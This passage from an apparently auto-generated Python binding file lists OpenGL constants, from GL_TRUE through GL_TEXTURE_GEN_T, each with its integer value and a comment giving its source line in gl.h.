GL_TRUE = 1 # /usr/include/GL/gl.h:173
GL_BYTE = 5120 # /usr/include/GL/gl.h:176
GL_UNSIGNED_BYTE = 5121 # /usr/include/GL/gl.h:177
GL_SHORT = 5122 # /usr/include/GL/gl.h:178
GL_UNSIGNED_SHORT = 5123 # /usr/include/GL/gl.h:179
GL_INT = 5124 # /usr/include/GL/gl.h:180
GL_UNSIGNED_INT = 5125 # /usr/include/GL/gl.h:181
GL_FLOAT = 5126 # /usr/include/GL/gl.h:182
GL_2_BYTES = 5127 # /usr/include/GL/gl.h:183
GL_3_BYTES = 5128 # /usr/include/GL/gl.h:184
GL_4_BYTES = 5129 # /usr/include/GL/gl.h:185
GL_DOUBLE = 5130 # /usr/include/GL/gl.h:186
GL_POINTS = 0 # /usr/include/GL/gl.h:189
GL_LINES = 1 # /usr/include/GL/gl.h:190
GL_LINE_LOOP = 2 # /usr/include/GL/gl.h:191
GL_LINE_STRIP = 3 # /usr/include/GL/gl.h:192
GL_TRIANGLES = 4 # /usr/include/GL/gl.h:193
GL_TRIANGLE_STRIP = 5 # /usr/include/GL/gl.h:194
GL_TRIANGLE_FAN = 6 # /usr/include/GL/gl.h:195
GL_QUADS = 7 # /usr/include/GL/gl.h:196
GL_QUAD_STRIP = 8 # /usr/include/GL/gl.h:197
GL_POLYGON = 9 # /usr/include/GL/gl.h:198
GL_VERTEX_ARRAY = 32884 # /usr/include/GL/gl.h:201
GL_NORMAL_ARRAY = 32885 # /usr/include/GL/gl.h:202
GL_COLOR_ARRAY = 32886 # /usr/include/GL/gl.h:203
GL_INDEX_ARRAY = 32887 # /usr/include/GL/gl.h:204
GL_TEXTURE_COORD_ARRAY = 32888 # /usr/include/GL/gl.h:205
GL_EDGE_FLAG_ARRAY = 32889 # /usr/include/GL/gl.h:206
GL_VERTEX_ARRAY_SIZE = 32890 # /usr/include/GL/gl.h:207
GL_VERTEX_ARRAY_TYPE = 32891 # /usr/include/GL/gl.h:208
GL_VERTEX_ARRAY_STRIDE = 32892 # /usr/include/GL/gl.h:209
GL_NORMAL_ARRAY_TYPE = 32894 # /usr/include/GL/gl.h:210
GL_NORMAL_ARRAY_STRIDE = 32895 # /usr/include/GL/gl.h:211
GL_COLOR_ARRAY_SIZE = 32897 # /usr/include/GL/gl.h:212
GL_COLOR_ARRAY_TYPE = 32898 # /usr/include/GL/gl.h:213
GL_COLOR_ARRAY_STRIDE = 32899 # /usr/include/GL/gl.h:214
GL_INDEX_ARRAY_TYPE = 32901 # /usr/include/GL/gl.h:215
GL_INDEX_ARRAY_STRIDE = 32902 # /usr/include/GL/gl.h:216
GL_TEXTURE_COORD_ARRAY_SIZE = 32904 # /usr/include/GL/gl.h:217
GL_TEXTURE_COORD_ARRAY_TYPE = 32905 # /usr/include/GL/gl.h:218
GL_TEXTURE_COORD_ARRAY_STRIDE = 32906 # /usr/include/GL/gl.h:219
GL_EDGE_FLAG_ARRAY_STRIDE = 32908 # /usr/include/GL/gl.h:220
GL_VERTEX_ARRAY_POINTER = 32910 # /usr/include/GL/gl.h:221
GL_NORMAL_ARRAY_POINTER = 32911 # /usr/include/GL/gl.h:222
GL_COLOR_ARRAY_POINTER = 32912 # /usr/include/GL/gl.h:223
GL_INDEX_ARRAY_POINTER = 32913 # /usr/include/GL/gl.h:224
GL_TEXTURE_COORD_ARRAY_POINTER = 32914 # /usr/include/GL/gl.h:225
GL_EDGE_FLAG_ARRAY_POINTER = 32915 # /usr/include/GL/gl.h:226
GL_V2F = 10784 # /usr/include/GL/gl.h:227
GL_V3F = 10785 # /usr/include/GL/gl.h:228
GL_C4UB_V2F = 10786 # /usr/include/GL/gl.h:229
GL_C4UB_V3F = 10787 # /usr/include/GL/gl.h:230
GL_C3F_V3F = 10788 # /usr/include/GL/gl.h:231
GL_N3F_V3F = 10789 # /usr/include/GL/gl.h:232
GL_C4F_N3F_V3F = 10790 # /usr/include/GL/gl.h:233
GL_T2F_V3F = 10791 # /usr/include/GL/gl.h:234
GL_T4F_V4F = 10792 # /usr/include/GL/gl.h:235
GL_T2F_C4UB_V3F = 10793 # /usr/include/GL/gl.h:236
GL_T2F_C3F_V3F = 10794 # /usr/include/GL/gl.h:237
GL_T2F_N3F_V3F = 10795 # /usr/include/GL/gl.h:238
GL_T2F_C4F_N3F_V3F = 10796 # /usr/include/GL/gl.h:239
GL_T4F_C4F_N3F_V4F = 10797 # /usr/include/GL/gl.h:240
GL_MATRIX_MODE = 2976 # /usr/include/GL/gl.h:243
GL_MODELVIEW = 5888 # /usr/include/GL/gl.h:244
GL_PROJECTION = 5889 # /usr/include/GL/gl.h:245
GL_TEXTURE = 5890 # /usr/include/GL/gl.h:246
GL_POINT_SMOOTH = 2832 # /usr/include/GL/gl.h:249
GL_POINT_SIZE = 2833 # /usr/include/GL/gl.h:250
GL_POINT_SIZE_GRANULARITY = 2835 # /usr/include/GL/gl.h:251
GL_POINT_SIZE_RANGE = 2834 # /usr/include/GL/gl.h:252
GL_LINE_SMOOTH = 2848 # /usr/include/GL/gl.h:255
GL_LINE_STIPPLE = 2852 # /usr/include/GL/gl.h:256
GL_LINE_STIPPLE_PATTERN = 2853 # /usr/include/GL/gl.h:257
GL_LINE_STIPPLE_REPEAT = 2854 # /usr/include/GL/gl.h:258
GL_LINE_WIDTH = 2849 # /usr/include/GL/gl.h:259
GL_LINE_WIDTH_GRANULARITY = 2851 # /usr/include/GL/gl.h:260
GL_LINE_WIDTH_RANGE = 2850 # /usr/include/GL/gl.h:261
GL_POINT = 6912 # /usr/include/GL/gl.h:264
GL_LINE = 6913 # /usr/include/GL/gl.h:265
GL_FILL = 6914 # /usr/include/GL/gl.h:266
GL_CW = 2304 # /usr/include/GL/gl.h:267
GL_CCW = 2305 # /usr/include/GL/gl.h:268
GL_FRONT = 1028 # /usr/include/GL/gl.h:269
GL_BACK = 1029 # /usr/include/GL/gl.h:270
GL_POLYGON_MODE = 2880 # /usr/include/GL/gl.h:271
GL_POLYGON_SMOOTH = 2881 # /usr/include/GL/gl.h:272
GL_POLYGON_STIPPLE = 2882 # /usr/include/GL/gl.h:273
GL_EDGE_FLAG = 2883 # /usr/include/GL/gl.h:274
GL_CULL_FACE = 2884 # /usr/include/GL/gl.h:275
GL_CULL_FACE_MODE = 2885 # /usr/include/GL/gl.h:276
GL_FRONT_FACE = 2886 # /usr/include/GL/gl.h:277
GL_POLYGON_OFFSET_FACTOR = 32824 # /usr/include/GL/gl.h:278
GL_POLYGON_OFFSET_UNITS = 10752 # /usr/include/GL/gl.h:279
GL_POLYGON_OFFSET_POINT = 10753 # /usr/include/GL/gl.h:280
GL_POLYGON_OFFSET_LINE = 10754 # /usr/include/GL/gl.h:281
GL_POLYGON_OFFSET_FILL = 32823 # /usr/include/GL/gl.h:282
GL_COMPILE = 4864 # /usr/include/GL/gl.h:285
GL_COMPILE_AND_EXECUTE = 4865 # /usr/include/GL/gl.h:286
GL_LIST_BASE = 2866 # /usr/include/GL/gl.h:287
GL_LIST_INDEX = 2867 # /usr/include/GL/gl.h:288
GL_LIST_MODE = 2864 # /usr/include/GL/gl.h:289
GL_NEVER = 512 # /usr/include/GL/gl.h:292
GL_LESS = 513 # /usr/include/GL/gl.h:293
GL_EQUAL = 514 # /usr/include/GL/gl.h:294
GL_LEQUAL = 515 # /usr/include/GL/gl.h:295
GL_GREATER = 516 # /usr/include/GL/gl.h:296
GL_NOTEQUAL = 517 # /usr/include/GL/gl.h:297
GL_GEQUAL = 518 # /usr/include/GL/gl.h:298
GL_ALWAYS = 519 # /usr/include/GL/gl.h:299
GL_DEPTH_TEST = 2929 # /usr/include/GL/gl.h:300
GL_DEPTH_BITS = 3414 # /usr/include/GL/gl.h:301
GL_DEPTH_CLEAR_VALUE = 2931 # /usr/include/GL/gl.h:302
GL_DEPTH_FUNC = 2932 # /usr/include/GL/gl.h:303
GL_DEPTH_RANGE = 2928 # /usr/include/GL/gl.h:304
GL_DEPTH_WRITEMASK = 2930 # /usr/include/GL/gl.h:305
GL_DEPTH_COMPONENT = 6402 # /usr/include/GL/gl.h:306
GL_LIGHTING = 2896 # /usr/include/GL/gl.h:309
GL_LIGHT0 = 16384 # /usr/include/GL/gl.h:310
GL_LIGHT1 = 16385 # /usr/include/GL/gl.h:311
GL_LIGHT2 = 16386 # /usr/include/GL/gl.h:312
GL_LIGHT3 = 16387 # /usr/include/GL/gl.h:313
GL_LIGHT4 = 16388 # /usr/include/GL/gl.h:314
GL_LIGHT5 = 16389 # /usr/include/GL/gl.h:315
GL_LIGHT6 = 16390 # /usr/include/GL/gl.h:316
GL_LIGHT7 = 16391 # /usr/include/GL/gl.h:317
GL_SPOT_EXPONENT = 4613 # /usr/include/GL/gl.h:318
GL_SPOT_CUTOFF = 4614 # /usr/include/GL/gl.h:319
GL_CONSTANT_ATTENUATION = 4615 # /usr/include/GL/gl.h:320
GL_LINEAR_ATTENUATION = 4616 # /usr/include/GL/gl.h:321
GL_QUADRATIC_ATTENUATION = 4617 # /usr/include/GL/gl.h:322
GL_AMBIENT = 4608 # /usr/include/GL/gl.h:323
GL_DIFFUSE = 4609 # /usr/include/GL/gl.h:324
GL_SPECULAR = 4610 # /usr/include/GL/gl.h:325
GL_SHININESS = 5633 # /usr/include/GL/gl.h:326
GL_EMISSION = 5632 # /usr/include/GL/gl.h:327
GL_POSITION = 4611 # /usr/include/GL/gl.h:328
GL_SPOT_DIRECTION = 4612 # /usr/include/GL/gl.h:329
GL_AMBIENT_AND_DIFFUSE = 5634 # /usr/include/GL/gl.h:330
GL_COLOR_INDEXES = 5635 # /usr/include/GL/gl.h:331
GL_LIGHT_MODEL_TWO_SIDE = 2898 # /usr/include/GL/gl.h:332
GL_LIGHT_MODEL_LOCAL_VIEWER = 2897 # /usr/include/GL/gl.h:333
GL_LIGHT_MODEL_AMBIENT = 2899 # /usr/include/GL/gl.h:334
GL_FRONT_AND_BACK = 1032 # /usr/include/GL/gl.h:335
GL_SHADE_MODEL = 2900 # /usr/include/GL/gl.h:336
GL_FLAT = 7424 # /usr/include/GL/gl.h:337
GL_SMOOTH = 7425 # /usr/include/GL/gl.h:338
GL_COLOR_MATERIAL = 2903 # /usr/include/GL/gl.h:339
GL_COLOR_MATERIAL_FACE = 2901 # /usr/include/GL/gl.h:340
GL_COLOR_MATERIAL_PARAMETER = 2902 # /usr/include/GL/gl.h:341
GL_NORMALIZE = 2977 # /usr/include/GL/gl.h:342
GL_CLIP_PLANE0 = 12288 # /usr/include/GL/gl.h:345
GL_CLIP_PLANE1 = 12289 # /usr/include/GL/gl.h:346
GL_CLIP_PLANE2 = 12290 # /usr/include/GL/gl.h:347
GL_CLIP_PLANE3 = 12291 # /usr/include/GL/gl.h:348
GL_CLIP_PLANE4 = 12292 # /usr/include/GL/gl.h:349
GL_CLIP_PLANE5 = 12293 # /usr/include/GL/gl.h:350
GL_ACCUM_RED_BITS = 3416 # /usr/include/GL/gl.h:353
GL_ACCUM_GREEN_BITS = 3417 # /usr/include/GL/gl.h:354
GL_ACCUM_BLUE_BITS = 3418 # /usr/include/GL/gl.h:355
GL_ACCUM_ALPHA_BITS = 3419 # /usr/include/GL/gl.h:356
GL_ACCUM_CLEAR_VALUE = 2944 # /usr/include/GL/gl.h:357
GL_ACCUM = 256 # /usr/include/GL/gl.h:358
GL_ADD = 260 # /usr/include/GL/gl.h:359
GL_LOAD = 257 # /usr/include/GL/gl.h:360
GL_MULT = 259 # /usr/include/GL/gl.h:361
GL_RETURN = 258 # /usr/include/GL/gl.h:362
GL_ALPHA_TEST = 3008 # /usr/include/GL/gl.h:365
GL_ALPHA_TEST_REF = 3010 # /usr/include/GL/gl.h:366
GL_ALPHA_TEST_FUNC = 3009 # /usr/include/GL/gl.h:367
GL_BLEND = 3042 # /usr/include/GL/gl.h:370
GL_BLEND_SRC = 3041 # /usr/include/GL/gl.h:371
GL_BLEND_DST = 3040 # /usr/include/GL/gl.h:372
GL_ZERO = 0 # /usr/include/GL/gl.h:373
GL_ONE = 1 # /usr/include/GL/gl.h:374
GL_SRC_COLOR = 768 # /usr/include/GL/gl.h:375
GL_ONE_MINUS_SRC_COLOR = 769 # /usr/include/GL/gl.h:376
GL_SRC_ALPHA = 770 # /usr/include/GL/gl.h:377
GL_ONE_MINUS_SRC_ALPHA = 771 # /usr/include/GL/gl.h:378
GL_DST_ALPHA = 772 # /usr/include/GL/gl.h:379
GL_ONE_MINUS_DST_ALPHA = 773 # /usr/include/GL/gl.h:380
GL_DST_COLOR = 774 # /usr/include/GL/gl.h:381
GL_ONE_MINUS_DST_COLOR = 775 # /usr/include/GL/gl.h:382
GL_SRC_ALPHA_SATURATE = 776 # /usr/include/GL/gl.h:383
GL_FEEDBACK = 7169 # /usr/include/GL/gl.h:386
GL_RENDER = 7168 # /usr/include/GL/gl.h:387
GL_SELECT = 7170 # /usr/include/GL/gl.h:388
GL_2D = 1536 # /usr/include/GL/gl.h:391
GL_3D = 1537 # /usr/include/GL/gl.h:392
GL_3D_COLOR = 1538 # /usr/include/GL/gl.h:393
GL_3D_COLOR_TEXTURE = 1539 # /usr/include/GL/gl.h:394
GL_4D_COLOR_TEXTURE = 1540 # /usr/include/GL/gl.h:395
GL_POINT_TOKEN = 1793 # /usr/include/GL/gl.h:396
GL_LINE_TOKEN = 1794 # /usr/include/GL/gl.h:397
GL_LINE_RESET_TOKEN = 1799 # /usr/include/GL/gl.h:398
GL_POLYGON_TOKEN = 1795 # /usr/include/GL/gl.h:399
GL_BITMAP_TOKEN = 1796 # /usr/include/GL/gl.h:400
GL_DRAW_PIXEL_TOKEN = 1797 # /usr/include/GL/gl.h:401
GL_COPY_PIXEL_TOKEN = 1798 # /usr/include/GL/gl.h:402
GL_PASS_THROUGH_TOKEN = 1792 # /usr/include/GL/gl.h:403
GL_FEEDBACK_BUFFER_POINTER = 3568 # /usr/include/GL/gl.h:404
GL_FEEDBACK_BUFFER_SIZE = 3569 # /usr/include/GL/gl.h:405
GL_FEEDBACK_BUFFER_TYPE = 3570 # /usr/include/GL/gl.h:406
GL_SELECTION_BUFFER_POINTER = 3571 # /usr/include/GL/gl.h:409
GL_SELECTION_BUFFER_SIZE = 3572 # /usr/include/GL/gl.h:410
GL_FOG = 2912 # /usr/include/GL/gl.h:413
GL_FOG_MODE = 2917 # /usr/include/GL/gl.h:414
GL_FOG_DENSITY = 2914 # /usr/include/GL/gl.h:415
GL_FOG_COLOR = 2918 # /usr/include/GL/gl.h:416
GL_FOG_INDEX = 2913 # /usr/include/GL/gl.h:417
GL_FOG_START = 2915 # /usr/include/GL/gl.h:418
GL_FOG_END = 2916 # /usr/include/GL/gl.h:419
GL_LINEAR = 9729 # /usr/include/GL/gl.h:420
GL_EXP = 2048 # /usr/include/GL/gl.h:421
GL_EXP2 = 2049 # /usr/include/GL/gl.h:422
GL_LOGIC_OP = 3057 # /usr/include/GL/gl.h:425
GL_INDEX_LOGIC_OP = 3057 # /usr/include/GL/gl.h:426
GL_COLOR_LOGIC_OP = 3058 # /usr/include/GL/gl.h:427
GL_LOGIC_OP_MODE = 3056 # /usr/include/GL/gl.h:428
GL_CLEAR = 5376 # /usr/include/GL/gl.h:429
GL_SET = 5391 # /usr/include/GL/gl.h:430
GL_COPY = 5379 # /usr/include/GL/gl.h:431
GL_COPY_INVERTED = 5388 # /usr/include/GL/gl.h:432
GL_NOOP = 5381 # /usr/include/GL/gl.h:433
GL_INVERT = 5386 # /usr/include/GL/gl.h:434
GL_AND = 5377 # /usr/include/GL/gl.h:435
GL_NAND = 5390 # /usr/include/GL/gl.h:436
GL_OR = 5383 # /usr/include/GL/gl.h:437
GL_NOR = 5384 # /usr/include/GL/gl.h:438
GL_XOR = 5382 # /usr/include/GL/gl.h:439
GL_EQUIV = 5385 # /usr/include/GL/gl.h:440
GL_AND_REVERSE = 5378 # /usr/include/GL/gl.h:441
GL_AND_INVERTED = 5380 # /usr/include/GL/gl.h:442
GL_OR_REVERSE = 5387 # /usr/include/GL/gl.h:443
GL_OR_INVERTED = 5389 # /usr/include/GL/gl.h:444
GL_STENCIL_BITS = 3415 # /usr/include/GL/gl.h:447
GL_STENCIL_TEST = 2960 # /usr/include/GL/gl.h:448
GL_STENCIL_CLEAR_VALUE = 2961 # /usr/include/GL/gl.h:449
GL_STENCIL_FUNC = 2962 # /usr/include/GL/gl.h:450
GL_STENCIL_VALUE_MASK = 2963 # /usr/include/GL/gl.h:451
GL_STENCIL_FAIL = 2964 # /usr/include/GL/gl.h:452
GL_STENCIL_PASS_DEPTH_FAIL = 2965 # /usr/include/GL/gl.h:453
GL_STENCIL_PASS_DEPTH_PASS = 2966 # /usr/include/GL/gl.h:454
GL_STENCIL_REF = 2967 # /usr/include/GL/gl.h:455
GL_STENCIL_WRITEMASK = 2968 # /usr/include/GL/gl.h:456
GL_STENCIL_INDEX = 6401 # /usr/include/GL/gl.h:457
GL_KEEP = 7680 # /usr/include/GL/gl.h:458
GL_REPLACE = 7681 # /usr/include/GL/gl.h:459
GL_INCR = 7682 # /usr/include/GL/gl.h:460
GL_DECR = 7683 # /usr/include/GL/gl.h:461
GL_NONE = 0 # /usr/include/GL/gl.h:464
GL_LEFT = 1030 # /usr/include/GL/gl.h:465
GL_RIGHT = 1031 # /usr/include/GL/gl.h:466
GL_FRONT_LEFT = 1024 # /usr/include/GL/gl.h:470
GL_FRONT_RIGHT = 1025 # /usr/include/GL/gl.h:471
GL_BACK_LEFT = 1026 # /usr/include/GL/gl.h:472
GL_BACK_RIGHT = 1027 # /usr/include/GL/gl.h:473
GL_AUX0 = 1033 # /usr/include/GL/gl.h:474
GL_AUX1 = 1034 # /usr/include/GL/gl.h:475
GL_AUX2 = 1035 # /usr/include/GL/gl.h:476
GL_AUX3 = 1036 # /usr/include/GL/gl.h:477
GL_COLOR_INDEX = 6400 # /usr/include/GL/gl.h:478
GL_RED = 6403 # /usr/include/GL/gl.h:479
GL_GREEN = 6404 # /usr/include/GL/gl.h:480
GL_BLUE = 6405 # /usr/include/GL/gl.h:481
GL_ALPHA = 6406 # /usr/include/GL/gl.h:482
GL_LUMINANCE = 6409 # /usr/include/GL/gl.h:483
GL_LUMINANCE_ALPHA = 6410 # /usr/include/GL/gl.h:484
GL_ALPHA_BITS = 3413 # /usr/include/GL/gl.h:485
GL_RED_BITS = 3410 # /usr/include/GL/gl.h:486
GL_GREEN_BITS = 3411 # /usr/include/GL/gl.h:487
GL_BLUE_BITS = 3412 # /usr/include/GL/gl.h:488
GL_INDEX_BITS = 3409 # /usr/include/GL/gl.h:489
GL_SUBPIXEL_BITS = 3408 # /usr/include/GL/gl.h:490
GL_AUX_BUFFERS = 3072 # /usr/include/GL/gl.h:491
GL_READ_BUFFER = 3074 # /usr/include/GL/gl.h:492
GL_DRAW_BUFFER = 3073 # /usr/include/GL/gl.h:493
GL_DOUBLEBUFFER = 3122 # /usr/include/GL/gl.h:494
GL_STEREO = 3123 # /usr/include/GL/gl.h:495
GL_BITMAP = 6656 # /usr/include/GL/gl.h:496
GL_COLOR = 6144 # /usr/include/GL/gl.h:497
GL_DEPTH = 6145 # /usr/include/GL/gl.h:498
GL_STENCIL = 6146 # /usr/include/GL/gl.h:499
GL_DITHER = 3024 # /usr/include/GL/gl.h:500
GL_RGB = 6407 # /usr/include/GL/gl.h:501
GL_RGBA = 6408 # /usr/include/GL/gl.h:502
GL_MAX_LIST_NESTING = 2865 # /usr/include/GL/gl.h:505
GL_MAX_EVAL_ORDER = 3376 # /usr/include/GL/gl.h:506
GL_MAX_LIGHTS = 3377 # /usr/include/GL/gl.h:507
GL_MAX_CLIP_PLANES = 3378 # /usr/include/GL/gl.h:508
GL_MAX_TEXTURE_SIZE = 3379 # /usr/include/GL/gl.h:509
GL_MAX_PIXEL_MAP_TABLE = 3380 # /usr/include/GL/gl.h:510
GL_MAX_ATTRIB_STACK_DEPTH = 3381 # /usr/include/GL/gl.h:511
GL_MAX_MODELVIEW_STACK_DEPTH = 3382 # /usr/include/GL/gl.h:512
GL_MAX_NAME_STACK_DEPTH = 3383 # /usr/include/GL/gl.h:513
GL_MAX_PROJECTION_STACK_DEPTH = 3384 # /usr/include/GL/gl.h:514
GL_MAX_TEXTURE_STACK_DEPTH = 3385 # /usr/include/GL/gl.h:515
GL_MAX_VIEWPORT_DIMS = 3386 # /usr/include/GL/gl.h:516
GL_MAX_CLIENT_ATTRIB_STACK_DEPTH = 3387 # /usr/include/GL/gl.h:517
GL_ATTRIB_STACK_DEPTH = 2992 # /usr/include/GL/gl.h:520
GL_CLIENT_ATTRIB_STACK_DEPTH = 2993 # /usr/include/GL/gl.h:521
GL_COLOR_CLEAR_VALUE = 3106 # /usr/include/GL/gl.h:522
GL_COLOR_WRITEMASK = 3107 # /usr/include/GL/gl.h:523
GL_CURRENT_INDEX = 2817 # /usr/include/GL/gl.h:524
GL_CURRENT_COLOR = 2816 # /usr/include/GL/gl.h:525
GL_CURRENT_NORMAL = 2818 # /usr/include/GL/gl.h:526
GL_CURRENT_RASTER_COLOR = 2820 # /usr/include/GL/gl.h:527
GL_CURRENT_RASTER_DISTANCE = 2825 # /usr/include/GL/gl.h:528
GL_CURRENT_RASTER_INDEX = 2821 # /usr/include/GL/gl.h:529
GL_CURRENT_RASTER_POSITION = 2823 # /usr/include/GL/gl.h:530
GL_CURRENT_RASTER_TEXTURE_COORDS = 2822 # /usr/include/GL/gl.h:531
GL_CURRENT_RASTER_POSITION_VALID = 2824 # /usr/include/GL/gl.h:532
GL_CURRENT_TEXTURE_COORDS = 2819 # /usr/include/GL/gl.h:533
GL_INDEX_CLEAR_VALUE = 3104 # /usr/include/GL/gl.h:534
GL_INDEX_MODE = 3120 # /usr/include/GL/gl.h:535
GL_INDEX_WRITEMASK = 3105 # /usr/include/GL/gl.h:536
GL_MODELVIEW_MATRIX = 2982 # /usr/include/GL/gl.h:537
GL_MODELVIEW_STACK_DEPTH = 2979 # /usr/include/GL/gl.h:538
GL_NAME_STACK_DEPTH = 3440 # /usr/include/GL/gl.h:539
GL_PROJECTION_MATRIX = 2983 # /usr/include/GL/gl.h:540
GL_PROJECTION_STACK_DEPTH = 2980 # /usr/include/GL/gl.h:541
GL_RENDER_MODE = 3136 # /usr/include/GL/gl.h:542
GL_RGBA_MODE = 3121 # /usr/include/GL/gl.h:543
GL_TEXTURE_MATRIX = 2984 # /usr/include/GL/gl.h:544
GL_TEXTURE_STACK_DEPTH = 2981 # /usr/include/GL/gl.h:545
GL_VIEWPORT = 2978 # /usr/include/GL/gl.h:546
GL_AUTO_NORMAL = 3456 # /usr/include/GL/gl.h:549
GL_MAP1_COLOR_4 = 3472 # /usr/include/GL/gl.h:550
GL_MAP1_INDEX = 3473 # /usr/include/GL/gl.h:551
GL_MAP1_NORMAL = 3474 # /usr/include/GL/gl.h:552
GL_MAP1_TEXTURE_COORD_1 = 3475 # /usr/include/GL/gl.h:553
GL_MAP1_TEXTURE_COORD_2 = 3476 # /usr/include/GL/gl.h:554
GL_MAP1_TEXTURE_COORD_3 = 3477 # /usr/include/GL/gl.h:555
GL_MAP1_TEXTURE_COORD_4 = 3478 # /usr/include/GL/gl.h:556
GL_MAP1_VERTEX_3 = 3479 # /usr/include/GL/gl.h:557
GL_MAP1_VERTEX_4 = 3480 # /usr/include/GL/gl.h:558
GL_MAP2_COLOR_4 = 3504 # /usr/include/GL/gl.h:559
GL_MAP2_INDEX = 3505 # /usr/include/GL/gl.h:560
GL_MAP2_NORMAL = 3506 # /usr/include/GL/gl.h:561
GL_MAP2_TEXTURE_COORD_1 = 3507 # /usr/include/GL/gl.h:562
GL_MAP2_TEXTURE_COORD_2 = 3508 # /usr/include/GL/gl.h:563
GL_MAP2_TEXTURE_COORD_3 = 3509 # /usr/include/GL/gl.h:564
GL_MAP2_TEXTURE_COORD_4 = 3510 # /usr/include/GL/gl.h:565
GL_MAP2_VERTEX_3 = 3511 # /usr/include/GL/gl.h:566
GL_MAP2_VERTEX_4 = 3512 # /usr/include/GL/gl.h:567
GL_MAP1_GRID_DOMAIN = 3536 # /usr/include/GL/gl.h:568
GL_MAP1_GRID_SEGMENTS = 3537 # /usr/include/GL/gl.h:569
GL_MAP2_GRID_DOMAIN = 3538 # /usr/include/GL/gl.h:570
GL_MAP2_GRID_SEGMENTS = 3539 # /usr/include/GL/gl.h:571
GL_COEFF = 2560 # /usr/include/GL/gl.h:572
GL_ORDER = 2561 # /usr/include/GL/gl.h:573
GL_DOMAIN = 2562 # /usr/include/GL/gl.h:574
GL_PERSPECTIVE_CORRECTION_HINT = 3152 # /usr/include/GL/gl.h:577
GL_POINT_SMOOTH_HINT = 3153 # /usr/include/GL/gl.h:578
GL_LINE_SMOOTH_HINT = 3154 # /usr/include/GL/gl.h:579
GL_POLYGON_SMOOTH_HINT = 3155 # /usr/include/GL/gl.h:580
GL_FOG_HINT = 3156 # /usr/include/GL/gl.h:581
GL_DONT_CARE = 4352 # /usr/include/GL/gl.h:582
GL_FASTEST = 4353 # /usr/include/GL/gl.h:583
GL_NICEST = 4354 # /usr/include/GL/gl.h:584
GL_SCISSOR_BOX = 3088 # /usr/include/GL/gl.h:587
GL_SCISSOR_TEST = 3089 # /usr/include/GL/gl.h:588
GL_MAP_COLOR = 3344 # /usr/include/GL/gl.h:591
GL_MAP_STENCIL = 3345 # /usr/include/GL/gl.h:592
GL_INDEX_SHIFT = 3346 # /usr/include/GL/gl.h:593
GL_INDEX_OFFSET = 3347 # /usr/include/GL/gl.h:594
GL_RED_SCALE = 3348 # /usr/include/GL/gl.h:595
GL_RED_BIAS = 3349 # /usr/include/GL/gl.h:596
GL_GREEN_SCALE = 3352 # /usr/include/GL/gl.h:597
GL_GREEN_BIAS = 3353 # /usr/include/GL/gl.h:598
GL_BLUE_SCALE = 3354 # /usr/include/GL/gl.h:599
GL_BLUE_BIAS = 3355 # /usr/include/GL/gl.h:600
GL_ALPHA_SCALE = 3356 # /usr/include/GL/gl.h:601
GL_ALPHA_BIAS = 3357 # /usr/include/GL/gl.h:602
GL_DEPTH_SCALE = 3358 # /usr/include/GL/gl.h:603
GL_DEPTH_BIAS = 3359 # /usr/include/GL/gl.h:604
GL_PIXEL_MAP_S_TO_S_SIZE = 3249 # /usr/include/GL/gl.h:605
GL_PIXEL_MAP_I_TO_I_SIZE = 3248 # /usr/include/GL/gl.h:606
GL_PIXEL_MAP_I_TO_R_SIZE = 3250 # /usr/include/GL/gl.h:607
GL_PIXEL_MAP_I_TO_G_SIZE = 3251 # /usr/include/GL/gl.h:608
GL_PIXEL_MAP_I_TO_B_SIZE = 3252 # /usr/include/GL/gl.h:609
GL_PIXEL_MAP_I_TO_A_SIZE = 3253 # /usr/include/GL/gl.h:610
GL_PIXEL_MAP_R_TO_R_SIZE = 3254 # /usr/include/GL/gl.h:611
GL_PIXEL_MAP_G_TO_G_SIZE = 3255 # /usr/include/GL/gl.h:612
GL_PIXEL_MAP_B_TO_B_SIZE = 3256 # /usr/include/GL/gl.h:613
GL_PIXEL_MAP_A_TO_A_SIZE = 3257 # /usr/include/GL/gl.h:614
GL_PIXEL_MAP_S_TO_S = 3185 # /usr/include/GL/gl.h:615
GL_PIXEL_MAP_I_TO_I = 3184 # /usr/include/GL/gl.h:616
GL_PIXEL_MAP_I_TO_R = 3186 # /usr/include/GL/gl.h:617
GL_PIXEL_MAP_I_TO_G = 3187 # /usr/include/GL/gl.h:618
GL_PIXEL_MAP_I_TO_B = 3188 # /usr/include/GL/gl.h:619
GL_PIXEL_MAP_I_TO_A = 3189 # /usr/include/GL/gl.h:620
GL_PIXEL_MAP_R_TO_R = 3190 # /usr/include/GL/gl.h:621
GL_PIXEL_MAP_G_TO_G = 3191 # /usr/include/GL/gl.h:622
GL_PIXEL_MAP_B_TO_B = 3192 # /usr/include/GL/gl.h:623
GL_PIXEL_MAP_A_TO_A = 3193 # /usr/include/GL/gl.h:624
GL_PACK_ALIGNMENT = 3333 # /usr/include/GL/gl.h:625
GL_PACK_LSB_FIRST = 3329 # /usr/include/GL/gl.h:626
GL_PACK_ROW_LENGTH = 3330 # /usr/include/GL/gl.h:627
GL_PACK_SKIP_PIXELS = 3332 # /usr/include/GL/gl.h:628
GL_PACK_SKIP_ROWS = 3331 # /usr/include/GL/gl.h:629
GL_PACK_SWAP_BYTES = 3328 # /usr/include/GL/gl.h:630
GL_UNPACK_ALIGNMENT = 3317 # /usr/include/GL/gl.h:631
GL_UNPACK_LSB_FIRST = 3313 # /usr/include/GL/gl.h:632
GL_UNPACK_ROW_LENGTH = 3314 # /usr/include/GL/gl.h:633
GL_UNPACK_SKIP_PIXELS = 3316 # /usr/include/GL/gl.h:634
GL_UNPACK_SKIP_ROWS = 3315 # /usr/include/GL/gl.h:635
GL_UNPACK_SWAP_BYTES = 3312 # /usr/include/GL/gl.h:636
GL_ZOOM_X = 3350 # /usr/include/GL/gl.h:637
GL_ZOOM_Y = 3351 # /usr/include/GL/gl.h:638
GL_TEXTURE_ENV = 8960 # /usr/include/GL/gl.h:641
GL_TEXTURE_ENV_MODE = 8704 # /usr/include/GL/gl.h:642
GL_TEXTURE_1D = 3552 # /usr/include/GL/gl.h:643
GL_TEXTURE_2D = 3553 # /usr/include/GL/gl.h:644
GL_TEXTURE_WRAP_S = 10242 # /usr/include/GL/gl.h:645
GL_TEXTURE_WRAP_T = 10243 # /usr/include/GL/gl.h:646
GL_TEXTURE_MAG_FILTER = 10240 # /usr/include/GL/gl.h:647
GL_TEXTURE_MIN_FILTER = 10241 # /usr/include/GL/gl.h:648
GL_TEXTURE_ENV_COLOR = 8705 # /usr/include/GL/gl.h:649
GL_TEXTURE_GEN_S = 3168 # /usr/include/GL/gl.h:650
GL_TEXTURE_GEN_T = 3169 # /usr/include/GL/gl.h:651
